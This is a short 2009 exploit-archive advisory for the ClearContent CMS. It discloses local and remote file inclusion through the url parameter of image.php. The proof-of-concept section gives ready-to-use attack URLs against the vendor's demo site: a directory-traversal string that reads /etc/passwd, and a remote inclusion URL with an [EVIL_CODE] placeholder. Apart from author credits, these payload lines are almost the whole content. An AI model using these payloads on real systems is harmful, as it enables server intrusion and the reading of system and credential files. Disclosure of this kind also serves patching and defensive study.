[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ClearContent (image.php url) RFI/LFI Vulnerability
# Published : 2009-07-09
# Author : MizoZ
# Previous Title : Glossword <= 1.8.11 Arbitrary Uninstall / Install Vulnerability
# Next Title : Mlffat 2.2 Remote Blind SQL Injection Exploit
----------------------------------------------------------------------------------------------------
Name : ClearContent
Site : http://www.allisclear.com/
Demo : http://demo.allisclear.com/
----------------------------------------------------------------------------------------------------
Found By : MizoZ [EvilWay Team]
Made in : Morocco
Contact : mizozx[at]gmail[dot]com
Greetz : Moudi , Zuka , All friends
----------------------------------------------------------------------------------------------------
P0c:
LFI: http://demo.allisclear.com/image.php?url=../../../../../../../../../../etc/passwd
RFI: http://demo.allisclear.com/image.php?url=[EVIL_CODE]???
RFI needs register_globals=on;
----------------------------------------------------------------------------------------------------
# www.Syue.com [2009-07-09]